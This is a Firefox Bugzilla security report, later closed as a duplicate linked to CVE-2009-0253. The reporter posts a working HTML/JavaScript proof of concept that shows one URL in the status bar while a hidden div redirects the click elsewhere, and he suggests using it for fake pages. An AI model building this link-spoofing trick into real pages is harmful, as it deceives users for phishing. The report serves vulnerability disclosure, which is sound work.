Closed
Bug 513808
Opened 15 years ago
Closed 14 years ago
One Way Links in camouflage StatusBar! When do you Onmouse on the link! Preview is changed!
Categories
(Firefox :: Page Info Window, defect)
Firefox
Page Info Window
Tracking
()
RESOLVED
DUPLICATE
of bug 474967
People
(Reporter: vag_bracker, Unassigned)
References
()
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) Build Identifier: ALL Olhem esse codigo, e salvem ele como .html e abram ele no navegador! ;) <html> <body> <div id="mydiv" onmouseover="document.location='http://www.orkut.com.br';" style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div> <script> function updatebox(evt) { mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('mydiv').style.left=mouseX-1; document.getElementById('mydiv').style.top=mouseY-1; } </script> <center> <br> <font style="font-family:arial;font-size:32px">Barra de Status Obfuscation / Clickjacking</font><br> <font style="font-family:arial;font-size:24px">☻</font><br> <br> <hr size="3" width="500" color="#000000"> <br> <font style="font-family:arial;font-size:20px">Você clicará na página do google e será direcionada para a página do orkut! (O.O)</font><br> <br> <a href="http://www.google.com.br" onclick="updatebox(event)"><font style="font-family:arial;font-size:32px">http://www.google.com.br</font></a><br> <br> <hr size="3" width="500" color="#000000"> <br> <font style="font-family:arial;font-size:16px">Falha muito perigosa não acha? ELA NÃO FUNCIONA SE VOCÊ MANDAR ABRIR A PAGINA POR UMA NOVA ABA!!!</font><br> </center> <div style="position:absolute;bottom:0;"> <font style="font-family:arial;font-size:32px">Veja aqui...<br> | <br> V </font> </div> </body> </html> Tentem e vejam! xD Se desabilitar o JavaScript dae nao funfa! ABraço Reproducible: Always Steps to Reproduce: 1. Desenvolver o Código em JavaScript 2. Montar alguma pagina usando o metodo! 3. Fazer a festa com paginas fake! Actual Results: Talvez alguns que saibam estão usando para fins pessoais! Espero que tenha ajudado a todos com isso! e que tenha me expressado corretamente! Abraço! E boa sorte ae! Aceito Trabalho! ^^ To com 15 anos!
Comment 1•15 years ago
|
||
This is not "clickjacking". This code obscures the destination of a link (there's many ways to do that, such as redirects) but you are not hiding the existence of a 3rd party page containing the link. I've seen this example elsewhere, this is a duplicate. (also, it would be easier to achieve the same results by having the onclick just set document.location than to mess with moving the div around. Moving the div makes it superficially similar to clickjacking, but it isn't, really.)
Group: core-security
Summary: Uma Maneira de Camuflar Links na StatusBar! QUando ocorre o OnMouse sobre o link! O Preview é modificado! → One Way Links in camouflage StatusBar! When do you Onmouse on the link! Preview is changed!
Whiteboard: DUPEME
Comment 2•14 years ago
|
||
I guess I was remembering http://www.exploit-db.com/exploits/7842 from earlier in the year this was filed.
Updated•14 years ago
|
Alias: CVE-2009-0253
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•